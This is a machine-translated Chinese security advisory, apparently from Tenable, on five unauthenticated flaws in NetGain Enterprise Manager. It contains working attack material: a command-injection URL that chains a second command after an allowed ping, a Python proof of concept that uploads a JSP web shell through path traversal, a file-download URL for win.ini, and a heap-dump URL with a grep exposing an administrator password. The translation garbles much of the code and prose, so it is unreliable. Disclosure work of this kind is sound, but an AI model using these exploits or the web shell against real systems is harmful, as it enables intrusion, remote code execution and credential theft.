(R1) NetGain企业管理多个远程漏洞

在研究一个命令注入漏洞上发布利用数据库站得住脚的发现,多个远程漏洞NetGain企业经理。

cve - 2017 - 16608:不完整的命令注入补丁

NetGain试图修补Exploit-DB 877年7.2.586构建命令注入漏洞。补丁防止命令注入通过添加以下逻辑:

1. 论证参数必须是一个有效的IP地址
2. 命令必须开始”cmd / c平”或“ping - c 5”

显而易见的问题是,攻击者可以添加额外的信息所需的命令之后文本。例如,攻击者可以创建一个新目录使用命令参数”cmd / c萍| | mkdir C:\Users\Public\fun | |”。下面的URL是一个完整的例子:

[目标]http://: 8081 / u / jsp /工具/ exec.jsp ?命令= cmd % 20% 2 fc % 20平% 20% 7 c % 7 c % 20 mkdir % 20 c % % 5 cusers % 5 cpublic % 3 5 cfun % 20% 7 c % 7 c参数= 127.0.0.1&async_output = nessus_56043399

cve - 2017 - 16610:未经身份验证的JSP上传和执行

未经过身份验证的远程攻击者可以上传任意文件到远程服务器通过一个HTTP POST请求/ u / jsp /备份/ upload_save_do.jsp。这是特别有用,因为NetGain EM写访问web根。这意味着攻击者可以上传一个JSP web层。以下概念验证上传一个web壳到Javascript目录。

导入请求从requests_toolbelt.multipart导入系统。编码器进口MultipartEncoder如果len (sys.argv) ! = 3:打印“用法:/ nsg_backup_upload。。py < server_address > <口>“打印”的例子:python。/ nsg_backup_upload。py 192.168.1.38 8081 sys.exit (0);jsp_shell =(“< % @页面导入= \”java.util。*, io。*\"%>\n' '' '
\n' '\n' '\n' '
\n' '
\n' '<%\n' 'if (request.getParameter(\"cmd\") != null) {\n' 'out.println(\"Command: \" + request.getParameter(\"cmd\") + \"
\");\n' 'Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n' 'OutputStream os = p.getOutputStream();\n' 'InputStream in = p.getInputStream();\n' 'DataInputStream dis = new DataInputStream(in);\n' 'String disr = dis.readLine();\n' 'while ( disr != null ) {\n' 'out.println(disr);\n' 'disr = dis.readLine();\n' '}\n' '}\n' '%>\n' '
      
      
map
') multipart_data = MultipartEncoder( fields = { 'file': ('../u/js/shell.jsp', jsp_shell, 'text/plain') }) response = requests.post('http://' + sys.argv[1] + ':' + sys.argv[2] + '/u/jsp/backup/upload_save_do.jsp', data=multipart_data, headers={'Content-Type': multipart_data.content_type})

cve - 2017 - 16609:未经身份验证的文件下载

未经过身份验证的远程攻击者可以下载任何文件在远程服务器上通过一个HTTP GET请求(或文章)。下面的URL将下载C:\Windows\win.ini:

[目标]http://: 8081 / u / jsp /共同/ download.jsp ?文件名= win.ini&srcDir = C: \ Windows

cve - 2017 - 16607:未经身份验证的信息披露

NetGain EM允许一个未经身份验证的远程攻击者下载的所有进程的堆内存使用以下URL:

[目标]http://: 8081 / u / jsp /设置/ heapdumps.jsp ? dumpnow = 1

攻击者可以搜索记忆有趣的信息,如凭证。例如,站得住脚的发现转储的管理员的用户名和密码使用以下方法:

albinolobster@ubuntu: ~字符串。美元/ heapdump_2017_03_07_15_48_34。本| grep用户名=用户名=管理密码= thisismypassword % 21

cve - 2017 - 17406:不安全的反序列化Java对象

NetGain EM公开几个Java RMI注册在端口1800和1850。NetGain使用一些Java库,也知道是有用的在Java反序列化攻击包括bsh, Apache Commons集合,和Apache Commons类。站得住脚的确认一个未经身份验证的远程攻击者可能会使用反序列化攻击/ RMI实现远程代码执行。